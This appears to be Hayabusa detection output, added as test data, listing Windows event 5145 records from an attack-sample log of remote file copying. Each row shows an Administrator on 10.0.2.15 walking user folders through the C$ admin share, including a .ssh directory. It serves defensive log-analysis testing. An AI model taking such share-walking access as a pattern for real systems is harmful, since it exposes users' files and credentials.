+2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\.ssh | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
